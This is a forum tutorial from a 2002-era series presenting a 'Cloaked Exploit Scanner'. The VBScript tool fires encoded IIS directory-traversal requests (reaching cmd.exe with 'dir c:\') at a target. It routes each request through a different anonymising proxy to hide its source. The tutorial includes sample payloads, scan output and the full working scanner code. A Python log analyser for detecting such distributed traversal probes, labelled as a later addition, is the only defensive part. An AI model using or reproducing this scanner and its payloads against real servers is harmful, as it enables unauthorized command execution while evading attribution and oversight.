Overview

This is a continuation of my article on writing a Cloaked exploit scanner. In the first part we created a file called 'livehosts' containing a list of responding anonymising proxy servers. In this article we will look at how to rotate through this file, connecting to a target server via a different proxy server for every request we make.

If you have not already read parts I - IV of this set of articles on the tcpUtil code please refer to these threads first before attempting the following:
Part I of this document
Scripting Internet Connections Under Window$
Search Engine submission 'exploit'
Google 'exploit' - TCPUtil pt III


The Exploit File

Requests that are to be passed through the proxy to a server are listed in the 'exploit' file. A sample exploit file is included in the zip file at the end of this article, but you could stuff this file with just about anything. The file contains request URLs that the script will try to request (the code below sends a HEAD) on the target machine via a proxy.

For example, the format of a simple traversal exploit would be as follows.

/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\
The script will try each request line in turn, cycling through the list of proxies in the live hosts file.

Usage

Usage: scan.vbs [--Target|-t] Ip address or hostname of target
[--exploitfile|-e] file name to read exploit list from
[--proxyfile|-p] file name to read live proxies list from
[--Delay|-d] Page Time Out delay (in seconds) Default: 1 Seconds
[--Verbose|-v]
[--debug|-vv]
[--Help|-?]
An example

scan -t www.ntsa.org.uk -e exploit -p livehosts -d 1
The command above scans www.ntsa.org.uk using the file exploit as the list of requests and livehosts as the list of live anonymising proxy servers. The command produces the output below. Notice that each request is made via a different proxy server. The server response is the return code from the server. If the return code is 200 (successful) then you have (in the examples) found a traversal to the command line.

--Cloaked Exploit Scanner.
--July 2002 by NTSA.
--www.ntsa.org.uk

exploit: HEAD http://www.ntsa.org.uk/.%2e/.%2e/win...exe?/c+dir+c:\
HTTP/1.0
Proxy: 207.2.54.2
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%2e..%2ewin...exe?/c+dir+c:\
HTTP/1.0
Proxy: 12.34.48.126
Port: 80
Server Response> 404
exploit: HEAD http://www.ntsa.org.uk/..%2f..%2f..%...tem32/cmd.exe?
/c+dir+c:\ HTTP/1.0
Proxy: 12.34.48.129
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%2f..%2fwin...exe?/c+dir+c:\
HTTP/1.0
Proxy: 66.64.3.154
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%5c..%5c..%...innt/system32/
cmd.exe?/c+dir+c:\ HTTP/1.0
Proxy: 208.144.37.7
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%5c..%5cwin...exe?/c+dir+c:\
HTTP/1.0
Proxy: 207.35.39.100
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%5c../..%5c.../system32/cmd.
exe?/c+dir+c:\ HTTP/1.0
Proxy: 204.60.171.225
Port: 80
Server Response> 403
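
The following Python is added here as an example and is not part of the original article or of the scanner's zip file. It takes the defender's side of two points made above: the exploit file hides ../ behind %2e, %2f and %5c encodings, and the scan output shows every probe arriving from a different proxy address, so counting requests per IP never sees a pattern. The code normalizes a request target the way a server would before checking for traversal, then clusters such probes across source addresses in a constructed Common Log Format sample. The log lines, the RFC 5737 addresses, the 60 second window, the three-source threshold and the three-round decode bound are all assumptions of this example.

```python
import re
from collections import Counter
from datetime import timedelta, datetime
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap %252e-style double encoding


def normalize_path(raw):
    """Decode the request target the way a server would before routing it:
    percent-decode until stable (bounded), drop the query string, fold
    backslashes to slashes, lower-case, and collapse repeated slashes."""
    path = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.split("?", 1)[0].replace("\\", "/").lower()
    return re.sub(r"/+", "/", path)


def is_traversal_probe(raw):
    """True when any decoded path segment starts with '..'. That covers plain
    '../' as well as the dotted variants in the article's exploit file, e.g.
    '/..%2e..%2ewinnt' decodes to '/.....winnt'."""
    return any(seg.startswith("..") for seg in normalize_path(raw).split("/"))


# Common Log Format: '<ip> - - [<ts>] "<method> <target> HTTP/1.0" <status> <bytes>'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_log_line(line):
    """Return a dict for one CLF line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_distributed_probes(lines, window=timedelta(seconds=60), min_sources=3):
    """Cluster traversal probes that start within `window` of each other and
    report clusters seen from at least `min_sources` distinct IPs. Counting
    distinct sources, not requests per IP, is what catches a scan that sends
    every request through a different proxy (thresholds are assumptions)."""
    probes = [r for r in map(parse_log_line, lines) if r and is_traversal_probe(r["target"])]
    probes.sort(key=lambda r: r["ts"])
    clusters, current = [], []
    for rec in probes:
        if current and rec["ts"] - current[0]["ts"] > window:
            clusters.append(current)
            current = []
        current.append(rec)
    if current:
        clusters.append(current)
    findings = []
    for group in clusters:
        per_ip = Counter(r["ip"] for r in group)
        if len(per_ip) >= min_sources:
            findings.append({
                "first": group[0]["ts"],
                "last": group[-1]["ts"],
                "requests": len(group),
                "sources": len(per_ip),
                "per_source_max": max(per_ip.values()),
                # a 2xx to one of these probes is the result the scanner is after
                "successful": [r["target"] for r in group if 200 <= r["status"] < 300],
            })
    return findings


# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
# The probe targets use the same encodings as the article's exploit file.
SAMPLE_LOG = [
    r'192.0.2.10 - - [14/Jul/2002:10:01:02 +0000] "HEAD /.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 403 0',
    r'198.51.100.7 - - [14/Jul/2002:10:01:03 +0000] "GET /index.html HTTP/1.0" 200 1234',
    r'192.0.2.11 - - [14/Jul/2002:10:01:05 +0000] "HEAD /..%2e..%2ewinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0',
    r'192.0.2.12 - - [14/Jul/2002:10:01:09 +0000] "HEAD /..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 403 0',
    r'192.0.2.13 - - [14/Jul/2002:10:01:12 +0000] "HEAD /..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 0',
    r'192.0.2.14 - - [14/Jul/2002:10:01:15 +0000] "HEAD /..%5c../..%5c.../system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 403 0',
    r'198.51.100.7 - - [14/Jul/2002:10:01:20 +0000] "GET /images/logo.gif HTTP/1.0" 200 8080',
    r'192.0.2.15 - - [14/Jul/2002:10:01:22 +0000] "HEAD /%252e%252e/%252e%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 403 0',
    # a lone probe an hour later from one address: not a distributed scan
    r'192.0.2.99 - - [14/Jul/2002:11:15:00 +0000] "GET /../../winnt/win.ini HTTP/1.0" 403 0',
]

if __name__ == "__main__":
    for f in find_distributed_probes(SAMPLE_LOG):
        print(f"{f['sources']} sources sent {f['requests']} traversal probes between "
              f"{f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}; "
              f"max per source {f['per_source_max']}; succeeded: {f['successful']}")
```

On the sample the six probes fall into one cluster from six different addresses with at most one request each, which is exactly the shape a per-IP rate limit or ban list would miss; the one 200 in the cluster is the line to act on first. To run it against a real access log, replace SAMPLE_LOG with the file's lines and tune the window and source threshold to the site's normal traffic.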
Registration of the sbwinsock control

You need to register the sbwinsock.ocx control provided in the zip file at the end of this post. To register the OCX component run the following command:

regsvr32 <path_to_OCX>\<component_name>.OCX
The Code!

Code:
dim buffer,blncon,blnSkip,wtresp,secwait,blnLastcmdnull 'Program Vars
DIM blnbuff,blnifile,lang,sdelay,Verbose,debug,iFile,Ofile,str,Target,exploitfile,proxyfile 'User Vars
Dim oArgs, ArgNum 'Argument vars

Const sckTCPProtocol=0 
Const sckUDPProtocol=1

const FlgDebug =1
const flgVerbose =2
const flgEcho =3

Const ForReading = 1
const ForWriting = 2

WScript.Echo "--Cloaked Traversal Scanner."
WScript.Echo "--July 2002 by NTSA."
WScript.Echo "--www.ntsa.org.uk"
WScript.Echo ""

'Create a FSO for file I/O operations
Set fso = CreateObject("Scripting.FileSystemObject")
'Create the winsock object and route its events to the wsPop_ handlers
on error resume next
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
if err.number > 0 then 
out "Could not create an instance of the SBWinsck control.",flgEcho
out "You need to register SBWinsck.ocx using the regsvr32",flgEcho
out "command. (ie regsvr32 c:\path\sbWinsck.ocx where c:\path",flgEcho
out "is the full path to the ocx file.",flgEcho
'Nothing below can work without the control, so stop here
wscript.quit(1)
end if


GetUserParams

sp = split (proxylist,"|")
proxycount = cint(sp(0))
proxy = split(sp(1),",")

ex = split (ExploitList,"|")
Exploitcount = cint(ex(0))
Exploit = split(ex(1),",")

px = 0

for n = 0 to Exploitcount -1

sp = split(proxy(px),":")
host = sp(0)
port = sp(1)

str = "HEAD " & lcase("http://" & target & exploit(n)) & " HTTP/1.0"

out "exploit: " & STR,flgecho
out "Proxy: " & host,flgecho
out "Port: " & port,flgecho

tcpClient.Protocol = sckTCPProtocol
tcpClient.RemoteHost = host 
tcpClient.RemotePort =  port

tcpClient.Connect

tio = 0
'Poll twice a second until connected, skipped, or the delay (in seconds) is used up
do until blncon = true or blnskip = true or tio = sdelay *2
WSCRIPT.SLEEP 500
out "Waiting for connection...",FlgDebug
tio = tio + 1
LOOP

fail = false
'Timed out - Could not connect
if tio = sdelay *2 and blnskip =false then 
out "Could not connect to: " & tcpClient.RemoteHost &_
" on port: " & tcpClient.RemotePort & ".",FlgEcho
fail = true
end if

if fail = false then

tio = 0
do until blncon = false or tio = sdelay *2
	WSCRIPT.SLEEP 500
	out "Waiting for disconnection...",FlgDebug
	tio = tio + 1
loop

'Output the status code to screen: it follows "HTTP/1.x " on the first response line
out "Server Response> " & mid(buffer,10,3), Flgecho
	
end if

blncon = false
blnskip = false
buffer = ""

tcpclient.disconnect

px = px + 1
if px > proxycount -1 then px = 0	

Set tcpClient=nothing
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
next 

function ProxyList 

dim cnt, livehosts, entry, acc
cnt = 0

'Read proxies (host:port, one per line) until a lone "." or the end of the file
Set livehosts = fso.OpenTextFile(proxyfile, ForReading)
do until livehosts.AtEndOfStream
entry = trim(livehosts.ReadLine)
if entry = "." then exit do
if len(entry) > 0 then
	acc = acc & entry & ","
	cnt = cnt + 1
end if
loop
livehosts.Close

'Drop the trailing comma and prefix the count: "<count>|host:port,host:port,..."
if cnt > 0 then acc = left(acc,len(acc)-1)
ProxyList = cstr(cnt) & "|" & acc

end function

function ExploitList 

dim cnt, file, entry, acc
cnt = 0

'Read request lines until a lone "." or the end of the file
Set file = fso.OpenTextFile(exploitfile, ForReading)
do until file.AtEndOfStream
entry = trim(file.ReadLine)
if entry = "." then exit do
if len(entry) > 0 then
	acc = acc & entry & ","
	cnt = cnt + 1
end if
loop
file.Close

'Same "<count>|item,item,..." layout as ProxyList
if cnt > 0 then acc = left(acc,len(acc)-1)
ExploitList = cstr(cnt) & "|" & acc

end function


Sub wsPop_DataArrival(Byval b)

dim strdata
out "Data Arrival...",flgverbose	
'/* Get the data and add it to the buffer...
'*/
tcpClient.GetData strData,vbstring

if blnbuff = true then
buffer = buffer &  strdata
else
out strdata,Flgverbose
end if

'Data has just arrived - wait some 
'more to see if anything further comes
secwait = 100
blnskip = true

end sub

Sub wsPop_Connected()

blncon = true
blnskip = true
out "Connected...",flgverbose
'sending data to the host
out "Sending data...",flgverbose

sendandlog str & vbcrlf

out "Data sent.",flgverbose

End Sub

sub sendandlog(data)

'The extra CrLf gives the blank line that ends the HTTP request headers
tcpclient.SendData data & vbCrLf
LogDataSend(data)

end sub


sub LogDataSend(poststr)

'port is read from the proxy file as text, so compare it numerically
if cint(port) = 80 then
out "Sending:> " & poststr,Flgverbose
else 
'out "Sending:> " & poststr,FlgEcho
end if

end sub

Sub wsPop_Close()

blncon = false
out "Disconnected...",flgverbose

End Sub

function RemoveDel(str)

'Strip the "/" and "-" switch prefixes so "--target", "-t" and "/t" all compare alike
RemoveDel = replace(str,"/","")
RemoveDel = replace(RemoveDel,"-","")

end function

function IsEmpty(str)

if str & "" = "" then 
isempty = true
else
isempty = false
end if

end function

function iCount(str,del)

icount =0

for i = 1 to len(str)
if mid(str,i,1) = del then
	icount = icount +1
end if
next

icount = icount - 1

end function

function input(quest)

WScript.StdOut.Write(quest & ":>")
input = WScript.StdIn.ReadLine()

end function

sub out(str,flg)

select case flg
case flgEcho
	wscript.echo str
case flgVerbose
	if verbose = true or debug = true then
		wscript.echo str
	end if
case FlgDebug
	if debug = true then
		wscript.echo str
	end if
end select
end sub

sub GetUserParams

buffset = 0

Set oArgs = WScript.Arguments
ArgNum = 0
While ArgNum < oArgs.Count

Select Case RemoveDel(LCase(oArgs(ArgNum)))
	Case "exploitfile","e":
		ArgNum = ArgNum + 1
		If (fso.FileExists(oArgs(ArgNum))) Then
			exploitfile = oArgs(ArgNum)
		else
			out "Error! The file " & oArgs(ArgNum) & _
			" was not found.",FlgEcho
			out "",FlgEcho
			displayusage
			wscript.quit(1)
		end if
	Case "proxyfile","p":
		ArgNum = ArgNum + 1
		If (fso.FileExists(oArgs(ArgNum))) Then
			proxyfile = oArgs(ArgNum)
		else
			out "Error! The file " & oArgs(ArgNum) & _
			" was not found.",FlgEcho
			out "",FlgEcho
			displayusage
			wscript.quit(1)
		end if
	Case "target","t":
		ArgNum = ArgNum + 1
		Target = oArgs(ArgNum)
	Case "delay","d":
		ArgNum = ArgNum + 1
		sdelay = oArgs(ArgNum)
	Case "help","?":
		Call DisplayUsage
	Case "verbose", "v":
		Verbose = true
	Case "debug","vv":
		debug = true
	Case Else:
		WScript.Echo "Unknown argument "& oArgs(ArgNum)
		Call DisplayUsage
		wscript.quit(1)
End Select	

ArgNum = ArgNum + 1
Wend

blnbuff = true
buffset = 1

if isempty(sdelay) then
'Set default as 1 second delay before breaking connection
sdelay = 1
end if

if isempty(target) or isempty(exploitfile) or isempty(proxyfile) then
'All three inputs are mandatory
out "A target host, a proxy file and exploit file are required.",flgecho
DisplayUsage
wscript.quit(1)
else
out "target> " & target,flgdebug
out "exploitfile> " & exploitfile,flgdebug
out "proxyfile> " & proxyfile,flgdebug
end if

end sub

Sub DisplayUsage

WScript.Echo "Usage: scan.vbs [--Target|-t] Ip address or hostname of target"
WScript.Echo "        [--exploitfile|-e] file name to read exploit list from"
WScript.Echo "        [--proxyfile|-p] file name to read live proxies list from"
WScript.Echo "        [--Delay|-d] Page Time Out delay " & _ 
		   "(in seconds) Default: 1 Seconds"
WScript.Echo "        [--Verbose|-v]"
WScript.Echo "        [--debug|-vv]"
WScript.Echo "        [--Help|-?]"
WScript.Echo ""
WScript.Quit (1)	

End Sub
If you enjoyed this thread you may enjoy these others:

Cloaked Exploit Scanner Part I and Part II
Google 'exploit' - TCPUtil pt III
Open Source FTP Control
Web based classes
Backing up the IIS metabase.
What port is that?
Building your own IDS tripwire.
Credit card security
Dumping SQL data to a text file
Hunting down skript kiddies
Search Engine submission 'exploit'
Forced shutdown of a remote nt/2k server
Securing an installation of IIS 4. (No, seriously)
Remote DSN Connections, using WinAPIs and the registry
Scripting Internet Connections Under Window$